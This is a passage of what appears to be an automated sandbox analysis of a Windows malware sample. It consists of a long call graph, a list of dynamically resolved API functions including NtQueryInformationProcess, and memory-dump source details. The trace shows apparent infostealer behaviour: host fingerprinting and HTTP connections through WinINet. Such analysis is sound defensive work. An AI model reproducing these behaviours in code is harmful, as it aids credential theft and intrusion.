calls 13993->13994 13995 a72bfa 13994->13995 13996 a745c0 2 API calls 13995->13996 13997 a72c13 13996->13997 13998 a745c0 2 API calls 13997->13998 13999 a72c2c 13998->13999 14000 a745c0 2 API calls 13999->14000 14001 a72c45 14000->14001 14002 a745c0 2 API calls 14001->14002 14003 a72c5e 14002->14003 14004 a745c0 2 API calls 14003->14004 14005 a72c77 14004->14005 14006 a745c0 2 API calls 14005->14006 14007 a72c90 14006->14007 14008 a745c0 2 
API calls 14007->14008 14009 a72ca9 14008->14009 14010 a745c0 2 API calls 14009->14010 14011 a72cc2 14010->14011 14012 a745c0 2 API calls 14011->14012 14013 a72cdb 14012->14013 14014 a745c0 2 API calls 14013->14014 14015 a72cf4 14014->14015 14016 a745c0 2 API calls 14015->14016 14017 a72d0d 14016->14017 14018 a745c0 2 API calls 14017->14018 14019 a72d26 14018->14019 14020 a745c0 2 API calls 14019->14020 14021 a72d3f 14020->14021 14022 a745c0 2 API calls 14021->14022 14023 a72d58 14022->14023 14024 a745c0 2 API calls 14023->14024 14025 a72d71 14024->14025 14026 a745c0 2 API calls 14025->14026 14027 a72d8a 14026->14027 14028 a745c0 2 API calls 14027->14028 14029 a72da3 14028->14029 14030 a745c0 2 API calls 14029->14030 14031 a72dbc 14030->14031 14032 a745c0 2 API calls 14031->14032 14033 a72dd5 14032->14033 14034 a745c0 2 API calls 14033->14034 14035 a72dee 14034->14035 14036 a745c0 2 API calls 14035->14036 14037 a72e07 14036->14037 14038 a745c0 2 API calls 14037->14038 14039 a72e20 14038->14039 14040 a745c0 2 API calls 14039->14040 14041 a72e39 14040->14041 14042 a745c0 2 API calls 14041->14042 14043 a72e52 14042->14043 14044 a745c0 2 API calls 14043->14044 14045 a72e6b 14044->14045 14046 a745c0 2 API calls 14045->14046 14047 a72e84 14046->14047 14048 a745c0 2 API calls 14047->14048 14049 a72e9d 14048->14049 14050 a745c0 2 API calls 14049->14050 14051 a72eb6 14050->14051 14052 a745c0 2 API calls 14051->14052 14053 a72ecf 14052->14053 14054 a745c0 2 API calls 14053->14054 14055 a72ee8 14054->14055 14056 a745c0 2 API calls 14055->14056 14057 a72f01 14056->14057 14058 a745c0 2 API calls 14057->14058 14059 a72f1a 14058->14059 14060 a745c0 2 API calls 14059->14060 14061 a72f33 14060->14061 14062 a745c0 2 API calls 14061->14062 14063 a72f4c 14062->14063 14064 a745c0 2 API calls 14063->14064 14065 a72f65 14064->14065 14066 a745c0 2 API calls 14065->14066 14067 a72f7e 14066->14067 14068 a745c0 2 API calls 14067->14068 14069 a72f97 14068->14069 14070 a745c0 2 API calls 
14069->14070 14071 a72fb0 14070->14071 14072 a745c0 2 API calls 14071->14072 14073 a72fc9 14072->14073 14074 a745c0 2 API calls 14073->14074 14075 a72fe2 14074->14075 14076 a745c0 2 API calls 14075->14076 14077 a72ffb 14076->14077 14078 a745c0 2 API calls 14077->14078 14079 a73014 14078->14079 14080 a745c0 2 API calls 14079->14080 14081 a7302d 14080->14081 14082 a745c0 2 API calls 14081->14082 14083 a73046 14082->14083 14084 a745c0 2 API calls 14083->14084 14085 a7305f 14084->14085 14086 a745c0 2 API calls 14085->14086 14087 a73078 14086->14087 14088 a745c0 2 API calls 14087->14088 14089 a73091 14088->14089 14090 a745c0 2 API calls 14089->14090 14091 a730aa 14090->14091 14092 a745c0 2 API calls 14091->14092 14093 a730c3 14092->14093 14094 a745c0 2 API calls 14093->14094 14095 a730dc 14094->14095 14096 a745c0 2 API calls 14095->14096 14097 a730f5 14096->14097 14098 a745c0 2 API calls 14097->14098 14099 a7310e 14098->14099 14100 a745c0 2 API calls 14099->14100 14101 a73127 14100->14101 14102 a745c0 2 API calls 14101->14102 14103 a73140 14102->14103 14104 a745c0 2 API calls 14103->14104 14105 a73159 14104->14105 14106 a745c0 2 API calls 14105->14106 14107 a73172 14106->14107 14108 a745c0 2 API calls 14107->14108 14109 a7318b 14108->14109 14110 a745c0 2 API calls 14109->14110 14111 a731a4 14110->14111 14112 a745c0 2 API calls 14111->14112 14113 a731bd 14112->14113 14114 a745c0 2 API calls 14113->14114 14115 a731d6 14114->14115 14116 a745c0 2 API calls 14115->14116 14117 a731ef 14116->14117 14118 a745c0 2 API calls 14117->14118 14119 a73208 14118->14119 14120 a745c0 2 API calls 14119->14120 14121 a73221 14120->14121 14122 a745c0 2 API calls 14121->14122 14123 a7323a 14122->14123 14124 a745c0 2 API calls 14123->14124 14125 a73253 14124->14125 14126 a745c0 2 API calls 14125->14126 14127 a7326c 14126->14127 14128 a745c0 2 API calls 14127->14128 14129 a73285 14128->14129 14130 a745c0 2 API calls 14129->14130 14131 a7329e 14130->14131 14132 a745c0 2 API calls 14131->14132 
14133 a732b7 14132->14133 14134 a745c0 2 API calls 14133->14134 14135 a732d0 14134->14135 14136 a745c0 2 API calls 14135->14136 14137 a732e9 14136->14137 14138 a745c0 2 API calls 14137->14138 14139 a73302 14138->14139 14140 a745c0 2 API calls 14139->14140 14141 a7331b 14140->14141 14142 a745c0 2 API calls 14141->14142 14143 a73334 14142->14143 14144 a745c0 2 API calls 14143->14144 14145 a7334d 14144->14145 14146 a745c0 2 API calls 14145->14146 14147 a73366 14146->14147 14148 a745c0 2 API calls 14147->14148 14149 a7337f 14148->14149 14150 a745c0 2 API calls 14149->14150 14151 a73398 14150->14151 14152 a745c0 2 API calls 14151->14152 14153 a733b1 14152->14153 14154 a745c0 2 API calls 14153->14154 14155 a733ca 14154->14155 14156 a745c0 2 API calls 14155->14156 14157 a733e3 14156->14157 14158 a745c0 2 API calls 14157->14158 14159 a733fc 14158->14159 14160 a745c0 2 API calls 14159->14160 14161 a73415 14160->14161 14162 a745c0 2 API calls 14161->14162 14163 a7342e 14162->14163 14164 a745c0 2 API calls 14163->14164 14165 a73447 14164->14165 14166 a745c0 2 API calls 14165->14166 14167 a73460 14166->14167 14168 a745c0 2 API calls 14167->14168 14169 a73479 14168->14169 14170 a745c0 2 API calls 14169->14170 14171 a73492 14170->14171 14172 a745c0 2 API calls 14171->14172 14173 a734ab 14172->14173 14174 a745c0 2 API calls 14173->14174 14175 a734c4 14174->14175 14176 a745c0 2 API calls 14175->14176 14177 a734dd 14176->14177 14178 a745c0 2 API calls 14177->14178 14179 a734f6 14178->14179 14180 a745c0 2 API calls 14179->14180 14181 a7350f 14180->14181 14182 a745c0 2 API calls 14181->14182 14183 a73528 14182->14183 14184 a745c0 2 API calls 14183->14184 14185 a73541 14184->14185 14186 a745c0 2 API calls 14185->14186 14187 a7355a 14186->14187 14188 a745c0 2 API calls 14187->14188 14189 a73573 14188->14189 14190 a745c0 2 API calls 14189->14190 14191 a7358c 14190->14191 14192 a745c0 2 API calls 14191->14192 14193 a735a5 14192->14193 14194 a745c0 2 API calls 14193->14194 14195 a735be 
14194->14195 14196 a745c0 2 API calls 14195->14196 14197 a735d7 14196->14197 14198 a745c0 2 API calls 14197->14198 14199 a735f0 14198->14199 14200 a745c0 2 API calls 14199->14200 14201 a73609 14200->14201 14202 a745c0 2 API calls 14201->14202 14203 a73622 14202->14203 14204 a745c0 2 API calls 14203->14204 14205 a7363b 14204->14205 14206 a745c0 2 API calls 14205->14206 14207 a73654 14206->14207 14208 a745c0 2 API calls 14207->14208 14209 a7366d 14208->14209 14210 a745c0 2 API calls 14209->14210 14211 a73686 14210->14211 14212 a745c0 2 API calls 14211->14212 14213 a7369f 14212->14213 14214 a745c0 2 API calls 14213->14214 14215 a736b8 14214->14215 14216 a745c0 2 API calls 14215->14216 14217 a736d1 14216->14217 14218 a745c0 2 API calls 14217->14218 14219 a736ea 14218->14219 14220 a745c0 2 API calls 14219->14220 14221 a73703 14220->14221 14222 a745c0 2 API calls 14221->14222 14223 a7371c 14222->14223 14224 a745c0 2 API calls 14223->14224 14225 a73735 14224->14225 14226 a745c0 2 API calls 14225->14226 14227 a7374e 14226->14227 14228 a745c0 2 API calls 14227->14228 14229 a73767 14228->14229 14230 a745c0 2 API calls 14229->14230 14231 a73780 14230->14231 14232 a745c0 2 API calls 14231->14232 14233 a73799 14232->14233 14234 a745c0 2 API calls 14233->14234 14235 a737b2 14234->14235 14236 a745c0 2 API calls 14235->14236 14237 a737cb 14236->14237 14238 a745c0 2 API calls 14237->14238 14239 a737e4 14238->14239 14240 a745c0 2 API calls 14239->14240 14241 a737fd 14240->14241 14242 a745c0 2 API calls 14241->14242 14243 a73816 14242->14243 14244 a745c0 2 API calls 14243->14244 14245 a7382f 14244->14245 14246 a745c0 2 API calls 14245->14246 14247 a73848 14246->14247 14248 a745c0 2 API calls 14247->14248 14249 a73861 14248->14249 14250 a745c0 2 API calls 14249->14250 14251 a7387a 14250->14251 14252 a745c0 2 API calls 14251->14252 14253 a73893 14252->14253 14254 a745c0 2 API calls 14253->14254 14255 a738ac 14254->14255 14256 a745c0 2 API calls 14255->14256 14257 a738c5 14256->14257 
14258 a745c0 2 API calls 14257->14258 14259 a738de 14258->14259 14260 a745c0 2 API calls 14259->14260 14261 a738f7 14260->14261 14262 a745c0 2 API calls 14261->14262 14263 a73910 14262->14263 14264 a745c0 2 API calls 14263->14264 14265 a73929 14264->14265 14266 a745c0 2 API calls 14265->14266 14267 a73942 14266->14267 14268 a745c0 2 API calls 14267->14268 14269 a7395b 14268->14269 14270 a745c0 2 API calls 14269->14270 14271 a73974 14270->14271 14272 a745c0 2 API calls 14271->14272 14273 a7398d 14272->14273 14274 a745c0 2 API calls 14273->14274 14275 a739a6 14274->14275 14276 a745c0 2 API calls 14275->14276 14277 a739bf 14276->14277 14278 a745c0 2 API calls 14277->14278 14279 a739d8 14278->14279 14280 a745c0 2 API calls 14279->14280 14281 a739f1 14280->14281 14282 a745c0 2 API calls 14281->14282 14283 a73a0a 14282->14283 14284 a745c0 2 API calls 14283->14284 14285 a73a23 14284->14285 14286 a745c0 2 API calls 14285->14286 14287 a73a3c 14286->14287 14288 a745c0 2 API calls 14287->14288 14289 a73a55 14288->14289 14290 a745c0 2 API calls 14289->14290 14291 a73a6e 14290->14291 14292 a745c0 2 API calls 14291->14292 14293 a73a87 14292->14293 14294 a745c0 2 API calls 14293->14294 14295 a73aa0 14294->14295 14296 a745c0 2 API calls 14295->14296 14297 a73ab9 14296->14297 14298 a745c0 2 API calls 14297->14298 14299 a73ad2 14298->14299 14300 a745c0 2 API calls 14299->14300 14301 a73aeb 14300->14301 14302 a745c0 2 API calls 14301->14302 14303 a73b04 14302->14303 14304 a745c0 2 API calls 14303->14304 14305 a73b1d 14304->14305 14306 a745c0 2 API calls 14305->14306 14307 a73b36 14306->14307 14308 a745c0 2 API calls 14307->14308 14309 a73b4f 14308->14309 14310 a745c0 2 API calls 14309->14310 14311 a73b68 14310->14311 14312 a745c0 2 API calls 14311->14312 14313 a73b81 14312->14313 14314 a745c0 2 API calls 14313->14314 14315 a73b9a 14314->14315 14316 a745c0 2 API calls 14315->14316 14317 a73bb3 14316->14317 14318 a745c0 2 API calls 14317->14318 14319 a73bcc 14318->14319 14320 a745c0 2 
API calls 14319->14320 14321 a73be5 14320->14321 14322 a745c0 2 API calls 14321->14322 14323 a73bfe 14322->14323 14324 a745c0 2 API calls 14323->14324 14325 a73c17 14324->14325 14326 a745c0 2 API calls 14325->14326 14327 a73c30 14326->14327 14328 a745c0 2 API calls 14327->14328 14329 a73c49 14328->14329 14330 a745c0 2 API calls 14329->14330 14331 a73c62 14330->14331 14332 a745c0 2 API calls 14331->14332 14333 a73c7b 14332->14333 14334 a745c0 2 API calls 14333->14334 14335 a73c94 14334->14335 14336 a745c0 2 API calls 14335->14336 14337 a73cad 14336->14337 14338 a745c0 2 API calls 14337->14338 14339 a73cc6 14338->14339 14340 a745c0 2 API calls 14339->14340 14341 a73cdf 14340->14341 14342 a745c0 2 API calls 14341->14342 14343 a73cf8 14342->14343 14344 a745c0 2 API calls 14343->14344 14345 a73d11 14344->14345 14346 a745c0 2 API calls 14345->14346 14347 a73d2a 14346->14347 14348 a745c0 2 API calls 14347->14348 14349 a73d43 14348->14349 14350 a745c0 2 API calls 14349->14350 14351 a73d5c 14350->14351 14352 a745c0 2 API calls 14351->14352 14353 a73d75 14352->14353 14354 a745c0 2 API calls 14353->14354 14355 a73d8e 14354->14355 14356 a745c0 2 API calls 14355->14356 14357 a73da7 14356->14357 14358 a745c0 2 API calls 14357->14358 14359 a73dc0 14358->14359 14360 a745c0 2 API calls 14359->14360 14361 a73dd9 14360->14361 14362 a745c0 2 API calls 14361->14362 14363 a73df2 14362->14363 14364 a745c0 2 API calls 14363->14364 14365 a73e0b 14364->14365 14366 a745c0 2 API calls 14365->14366 14367 a73e24 14366->14367 14368 a745c0 2 API calls 14367->14368 14369 a73e3d 14368->14369 14370 a745c0 2 API calls 14369->14370 14371 a73e56 14370->14371 14372 a745c0 2 API calls 14371->14372 14373 a73e6f 14372->14373 14374 a745c0 2 API calls 14373->14374 14375 a73e88 14374->14375 14376 a745c0 2 API calls 14375->14376 14377 a73ea1 14376->14377 14378 a745c0 2 API calls 14377->14378 14379 a73eba 14378->14379 14380 a745c0 2 API calls 14379->14380 14381 a73ed3 14380->14381 14382 a745c0 2 API calls 
14381->14382 14383 a73eec 14382->14383 14384 a745c0 2 API calls 14383->14384 14385 a73f05 14384->14385 14386 a745c0 2 API calls 14385->14386 14387 a73f1e 14386->14387 14388 a745c0 2 API calls 14387->14388 14389 a73f37 14388->14389 14390 a745c0 2 API calls 14389->14390 14391 a73f50 14390->14391 14392 a745c0 2 API calls 14391->14392 14393 a73f69 14392->14393 14394 a745c0 2 API calls 14393->14394 14395 a73f82 14394->14395 14396 a745c0 2 API calls 14395->14396 14397 a73f9b 14396->14397 14398 a745c0 2 API calls 14397->14398 14399 a73fb4 14398->14399 14400 a745c0 2 API calls 14399->14400 14401 a73fcd 14400->14401 14402 a745c0 2 API calls 14401->14402 14403 a73fe6 14402->14403 14404 a745c0 2 API calls 14403->14404 14405 a73fff 14404->14405 14406 a745c0 2 API calls 14405->14406 14407 a74018 14406->14407 14408 a745c0 2 API calls 14407->14408 14409 a74031 14408->14409 14410 a745c0 2 API calls 14409->14410 14411 a7404a 14410->14411 14412 a745c0 2 API calls 14411->14412 14413 a74063 14412->14413 14414 a745c0 2 API calls 14413->14414 14415 a7407c 14414->14415 14416 a745c0 2 API calls 14415->14416 14417 a74095 14416->14417 14418 a745c0 2 API calls 14417->14418 14419 a740ae 14418->14419 14420 a745c0 2 API calls 14419->14420 14421 a740c7 14420->14421 14422 a745c0 2 API calls 14421->14422 14423 a740e0 14422->14423 14424 a745c0 2 API calls 14423->14424 14425 a740f9 14424->14425 14426 a745c0 2 API calls 14425->14426 14427 a74112 14426->14427 14428 a745c0 2 API calls 14427->14428 14429 a7412b 14428->14429 14430 a745c0 2 API calls 14429->14430 14431 a74144 14430->14431 14432 a745c0 2 API calls 14431->14432 14433 a7415d 14432->14433 14434 a745c0 2 API calls 14433->14434 14435 a74176 14434->14435 14436 a745c0 2 API calls 14435->14436 14437 a7418f 14436->14437 14438 a745c0 2 API calls 14437->14438 14439 a741a8 14438->14439 14440 a745c0 2 API calls 14439->14440 14441 a741c1 14440->14441 14442 a745c0 2 API calls 14441->14442 14443 a741da 14442->14443 14444 a745c0 2 API calls 14443->14444 
14445 a741f3 14444->14445 14446 a745c0 2 API calls 14445->14446 14447 a7420c 14446->14447 14448 a745c0 2 API calls 14447->14448 14449 a74225 14448->14449 14450 a745c0 2 API calls 14449->14450 14451 a7423e 14450->14451 14452 a745c0 2 API calls 14451->14452 14453 a74257 14452->14453 14454 a745c0 2 API calls 14453->14454 14455 a74270 14454->14455 14456 a745c0 2 API calls 14455->14456 14457 a74289 14456->14457 14458 a745c0 2 API calls 14457->14458 14459 a742a2 14458->14459 14460 a745c0 2 API calls 14459->14460 14461 a742bb 14460->14461 14462 a745c0 2 API calls 14461->14462 14463 a742d4 14462->14463 14464 a745c0 2 API calls 14463->14464 14465 a742ed 14464->14465 14466 a745c0 2 API calls 14465->14466 14467 a74306 14466->14467 14468 a745c0 2 API calls 14467->14468 14469 a7431f 14468->14469 14470 a745c0 2 API calls 14469->14470 14471 a74338 14470->14471 14472 a745c0 2 API calls 14471->14472 14473 a74351 14472->14473 14474 a745c0 2 API calls 14473->14474 14475 a7436a 14474->14475 14476 a745c0 2 API calls 14475->14476 14477 a74383 14476->14477 14478 a745c0 2 API calls 14477->14478 14479 a7439c 14478->14479 14480 a745c0 2 API calls 14479->14480 14481 a743b5 14480->14481 14482 a745c0 2 API calls 14481->14482 14483 a743ce 14482->14483 14484 a745c0 2 API calls 14483->14484 14485 a743e7 14484->14485 14486 a745c0 2 API calls 14485->14486 14487 a74400 14486->14487 14488 a745c0 2 API calls 14487->14488 14489 a74419 14488->14489 14490 a745c0 2 API calls 14489->14490 14491 a74432 14490->14491 14492 a745c0 2 API calls 14491->14492 14493 a7444b 14492->14493 14494 a745c0 2 API calls 14493->14494 14495 a74464 14494->14495 14496 a745c0 2 API calls 14495->14496 14497 a7447d 14496->14497 14498 a745c0 2 API calls 14497->14498 14499 a74496 14498->14499 14500 a745c0 2 API calls 14499->14500 14501 a744af 14500->14501 14502 a745c0 2 API calls 14501->14502 14503 a744c8 14502->14503 14504 a745c0 2 API calls 14503->14504 14505 a744e1 14504->14505 14506 a745c0 2 API calls 14505->14506 14507 a744fa 
14506->14507 14508 a745c0 2 API calls 14507->14508 14509 a74513 14508->14509 14510 a745c0 2 API calls 14509->14510 14511 a7452c 14510->14511 14512 a745c0 2 API calls 14511->14512 14513 a74545 14512->14513 14514 a745c0 2 API calls 14513->14514 14515 a7455e 14514->14515 14516 a745c0 2 API calls 14515->14516 14517 a74577 14516->14517 14518 a745c0 2 API calls 14517->14518 14519 a74590 14518->14519 14520 a745c0 2 API calls 14519->14520 14521 a745a9 14520->14521 14522 a89c10 14521->14522 14523 a89c20 43 API calls 14522->14523 14524 a8a036 8 API calls 14522->14524 14523->14524 14525 a8a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14524->14525 14526 a8a146 14524->14526 14525->14526 14527 a8a153 8 API calls 14526->14527 14528 a8a216 14526->14528 14527->14528 14529 a8a298 14528->14529 14530 a8a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14528->14530 14531 a8a2a5 6 API calls 14529->14531 14532 a8a337 14529->14532 14530->14529 14531->14532 14533 a8a41f 14532->14533 14534 a8a344 9 API calls 14532->14534 14535 a8a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14533->14535 14536 a8a4a2 14533->14536 14534->14533 14535->14536 14537 a8a4ab GetProcAddress GetProcAddress 14536->14537 14538 a8a4dc 14536->14538 14537->14538 14539 a8a515 14538->14539 14540 a8a4e5 GetProcAddress GetProcAddress 14538->14540 14541 a8a612 14539->14541 14542 a8a522 10 API calls 14539->14542 14540->14539 14543 a8a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14541->14543 14544 a8a67d 14541->14544 14542->14541 14543->14544 14545 a8a69e 14544->14545 14546 a8a686 GetProcAddress 14544->14546 14547 a85ca3 14545->14547 14548 a8a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14545->14548 14546->14545 14549 a71590 14547->14549 14548->14547 15671 a71670 14549->15671 14552 a8a7a0 lstrcpy 14553 a715b5 14552->14553 14554 a8a7a0 lstrcpy 14553->14554 14555 a715c7 14554->14555 14556 a8a7a0 
lstrcpy 14555->14556 14557 a715d9 14556->14557 14558 a8a7a0 lstrcpy 14557->14558 14559 a71663 14558->14559 14560 a85510 14559->14560 14561 a85521 14560->14561 14562 a8a820 2 API calls 14561->14562 14563 a8552e 14562->14563 14564 a8a820 2 API calls 14563->14564 14565 a8553b 14564->14565 14566 a8a820 2 API calls 14565->14566 14567 a85548 14566->14567 14568 a8a740 lstrcpy 14567->14568 14569 a85555 14568->14569 14570 a8a740 lstrcpy 14569->14570 14571 a85562 14570->14571 14572 a8a740 lstrcpy 14571->14572 14573 a8556f 14572->14573 14574 a8a740 lstrcpy 14573->14574 14607 a8557c 14574->14607 14575 a852c0 25 API calls 14575->14607 14576 a851f0 20 API calls 14576->14607 14577 a85643 StrCmpCA 14577->14607 14578 a856a0 StrCmpCA 14579 a857dc 14578->14579 14578->14607 14580 a8a8a0 lstrcpy 14579->14580 14581 a857e8 14580->14581 14582 a8a820 2 API calls 14581->14582 14585 a857f6 14582->14585 14583 a8a740 lstrcpy 14583->14607 14584 a8a820 lstrlen lstrcpy 14584->14607 14587 a8a820 2 API calls 14585->14587 14586 a85856 StrCmpCA 14588 a85991 14586->14588 14586->14607 14590 a85805 14587->14590 14589 a8a8a0 lstrcpy 14588->14589 14591 a8599d 14589->14591 14592 a71670 lstrcpy 14590->14592 14593 a8a820 2 API calls 14591->14593 14602 a85811 14592->14602 14594 a859ab 14593->14594 14596 a8a820 2 API calls 14594->14596 14595 a85a0b StrCmpCA 14597 a85a28 14595->14597 14598 a85a16 Sleep 14595->14598 14600 a859ba 14596->14600 14601 a8a8a0 lstrcpy 14597->14601 14598->14607 14599 a8a7a0 lstrcpy 14599->14607 14603 a71670 lstrcpy 14600->14603 14604 a85a34 14601->14604 14602->13667 14603->14602 14606 a8a820 2 API calls 14604->14606 14605 a71590 lstrcpy 14605->14607 14608 a85a43 14606->14608 14607->14575 14607->14576 14607->14577 14607->14578 14607->14583 14607->14584 14607->14586 14607->14595 14607->14599 14607->14605 14611 a8578a StrCmpCA 14607->14611 14613 a8593f StrCmpCA 14607->14613 14614 a8a8a0 lstrcpy 14607->14614 14609 a8a820 2 API calls 14608->14609 14610 a85a52 14609->14610 14612 a71670 
lstrcpy 14610->14612 14611->14607 14612->14602 14613->14607 14614->14607 14616 a8754c 14615->14616 14617 a87553 GetVolumeInformationA 14615->14617 14616->14617 14618 a87591 14617->14618 14619 a875fc GetProcessHeap RtlAllocateHeap 14618->14619 14620 a87628 wsprintfA 14619->14620 14621 a87619 14619->14621 14622 a8a740 lstrcpy 14620->14622 14623 a8a740 lstrcpy 14621->14623 14624 a85da7 14622->14624 14623->14624 14624->13688 14626 a8a7a0 lstrcpy 14625->14626 14627 a74899 14626->14627 15680 a747b0 14627->15680 14629 a748a5 14630 a8a740 lstrcpy 14629->14630 14631 a748d7 14630->14631 14632 a8a740 lstrcpy 14631->14632 14633 a748e4 14632->14633 14634 a8a740 lstrcpy 14633->14634 14635 a748f1 14634->14635 14636 a8a740 lstrcpy 14635->14636 14637 a748fe 14636->14637 14638 a8a740 lstrcpy 14637->14638 14639 a7490b InternetOpenA StrCmpCA 14638->14639 14640 a74944 14639->14640 14641 a74955 14640->14641 14642 a74ecb InternetCloseHandle 14640->14642 15691 a88b60 14641->15691 14644 a74ee8 14642->14644 15686 a79ac0 CryptStringToBinaryA 14644->15686 14645 a74963 15699 a8a920 14645->15699 14648 a74976 14650 a8a8a0 lstrcpy 14648->14650 14656 a7497f 14650->14656 14651 a8a820 2 API calls 14652 a74f05 14651->14652 14653 a8a9b0 4 API calls 14652->14653 14655 a74f1b 14653->14655 14654 a74f27 codecvt 14658 a8a7a0 lstrcpy 14654->14658 14657 a8a8a0 lstrcpy 14655->14657 14659 a8a9b0 4 API calls 14656->14659 14657->14654 14670 a74f57 14658->14670 14660 a749a9 14659->14660 14661 a8a8a0 lstrcpy 14660->14661 14662 a749b2 14661->14662 14663 a8a9b0 4 API calls 14662->14663 14664 a749d1 14663->14664 14665 a8a8a0 lstrcpy 14664->14665 14666 a749da 14665->14666 14667 a8a920 3 API calls 14666->14667 14668 a749f8 14667->14668 14669 a8a8a0 lstrcpy 14668->14669 14671 a74a01 14669->14671 14670->13691 14672 a8a9b0 4 API calls 14671->14672 14673 a74a20 14672->14673 14674 a8a8a0 lstrcpy 14673->14674 14675 a74a29 14674->14675 14676 a8a9b0 4 API calls 14675->14676 14677 a74a48 14676->14677 14678 a8a8a0 lstrcpy 
14677->14678 14679 a74a51 14678->14679 14680 a8a9b0 4 API calls 14679->14680 14681 a74a7d 14680->14681 14682 a8a920 3 API calls 14681->14682 14683 a74a84 14682->14683 14684 a8a8a0 lstrcpy 14683->14684 14685 a74a8d 14684->14685 14686 a74aa3 InternetConnectA 14685->14686 14686->14642 14687 a74ad3 HttpOpenRequestA 14686->14687 14689 a74ebe InternetCloseHandle 14687->14689 14690 a74b28 14687->14690 14689->14642 14691 a8a9b0 4 API calls 14690->14691 14692 a74b3c 14691->14692 14693 a8a8a0 lstrcpy 14692->14693 14694 a74b45 14693->14694 14695 a8a920 3 API calls 14694->14695 14696 a74b63 14695->14696 14697 a8a8a0 lstrcpy 14696->14697 14698 a74b6c 14697->14698 14699 a8a9b0 4 API calls 14698->14699 14700 a74b8b 14699->14700 14701 a8a8a0 lstrcpy 14700->14701 14702 a74b94 14701->14702 14703 a8a9b0 4 API calls 14702->14703 14704 a74bb5 14703->14704 14705 a8a8a0 lstrcpy 14704->14705 14706 a74bbe 14705->14706 14707 a8a9b0 4 API calls 14706->14707 14708 a74bde 14707->14708 14709 a8a8a0 lstrcpy 14708->14709 14710 a74be7 14709->14710 14711 a8a9b0 4 API calls 14710->14711 14712 a74c06 14711->14712 14713 a8a8a0 lstrcpy 14712->14713 14714 a74c0f 14713->14714 14715 a8a920 3 API calls 14714->14715 14716 a74c2d 14715->14716 14717 a8a8a0 lstrcpy 14716->14717 14718 a74c36 14717->14718 14719 a8a9b0 4 API calls 14718->14719 14720 a74c55 14719->14720 14721 a8a8a0 lstrcpy 14720->14721 14722 a74c5e 14721->14722 14723 a8a9b0 4 API calls 14722->14723 14724 a74c7d 14723->14724 14725 a8a8a0 lstrcpy 14724->14725 14726 a74c86 14725->14726 14727 a8a920 3 API calls 14726->14727 14728 a74ca4 14727->14728 14729 a8a8a0 lstrcpy 14728->14729 14730 a74cad 14729->14730 14731 a8a9b0 4 API calls 14730->14731 14732 a74ccc 14731->14732 14733 a8a8a0 lstrcpy 14732->14733 14734 a74cd5 14733->14734 14735 a8a9b0 4 API calls 14734->14735 14736 a74cf6 14735->14736 14737 a8a8a0 lstrcpy 14736->14737 14738 a74cff 14737->14738 14739 a8a9b0 4 API calls 14738->14739 14740 a74d1f 14739->14740 14741 a8a8a0 lstrcpy 14740->14741 

                                  Control-flow Graph

                                  APIs
                                  • GetProcAddress.KERNEL32(77190000,00681648), ref: 00A898A1
                                  • GetProcAddress.KERNEL32(77190000,00681618), ref: 00A898BA
                                  • GetProcAddress.KERNEL32(77190000,00681660), ref: 00A898D2
                                  • GetProcAddress.KERNEL32(77190000,006817B0), ref: 00A898EA
                                  • GetProcAddress.KERNEL32(77190000,006817E0), ref: 00A89903
                                  • GetProcAddress.KERNEL32(77190000,00688BF8), ref: 00A8991B
                                  • GetProcAddress.KERNEL32(77190000,006754A8), ref: 00A89933
                                  • GetProcAddress.KERNEL32(77190000,00675588), ref: 00A8994C
                                  • GetProcAddress.KERNEL32(77190000,00681678), ref: 00A89964
                                  • GetProcAddress.KERNEL32(77190000,00681690), ref: 00A8997C
                                  • GetProcAddress.KERNEL32(77190000,006816A8), ref: 00A89995
                                  • GetProcAddress.KERNEL32(77190000,006814F8), ref: 00A899AD
                                  • GetProcAddress.KERNEL32(77190000,00675688), ref: 00A899C5
                                  • GetProcAddress.KERNEL32(77190000,00681510), ref: 00A899DE
                                  • GetProcAddress.KERNEL32(77190000,00681528), ref: 00A899F6
                                  • GetProcAddress.KERNEL32(77190000,006755A8), ref: 00A89A0E
                                  • GetProcAddress.KERNEL32(77190000,00681540), ref: 00A89A27
                                  • GetProcAddress.KERNEL32(77190000,00681558), ref: 00A89A3F
                                  • GetProcAddress.KERNEL32(77190000,00675408), ref: 00A89A57
                                  • GetProcAddress.KERNEL32(77190000,00681858), ref: 00A89A70
                                  • GetProcAddress.KERNEL32(77190000,00675728), ref: 00A89A88
                                  • LoadLibraryA.KERNEL32(00681888,?,00A86A00), ref: 00A89A9A
                                  • LoadLibraryA.KERNEL32(00681840,?,00A86A00), ref: 00A89AAB
                                  • LoadLibraryA.KERNEL32(00681828,?,00A86A00), ref: 00A89ABD
                                  • LoadLibraryA.KERNEL32(00681870,?,00A86A00), ref: 00A89ACF
                                  • LoadLibraryA.KERNEL32(00681810,?,00A86A00), ref: 00A89AE0
                                  • GetProcAddress.KERNEL32(76850000,006818A0), ref: 00A89B02
                                  • GetProcAddress.KERNEL32(77040000,006818B8), ref: 00A89B23
                                  • GetProcAddress.KERNEL32(77040000,006817F8), ref: 00A89B3B
                                  • GetProcAddress.KERNEL32(75A10000,00688E88), ref: 00A89B5D
                                  • GetProcAddress.KERNEL32(75690000,006755C8), ref: 00A89B7E
                                  • GetProcAddress.KERNEL32(776F0000,00688C18), ref: 00A89B9F
                                  • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00A89BB6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
